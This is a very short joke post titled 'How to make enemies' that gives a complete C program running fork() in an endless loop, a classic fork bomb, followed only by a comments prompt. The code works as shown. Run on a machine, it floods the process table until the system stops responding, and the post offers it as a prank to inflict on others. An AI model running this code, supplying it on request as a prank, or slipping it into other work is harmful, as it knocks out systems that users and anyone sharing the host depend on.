13

How to make enemies:

#include <unistd.h>

int main(void) {
while(1) fork();
}

Comments
Add Comment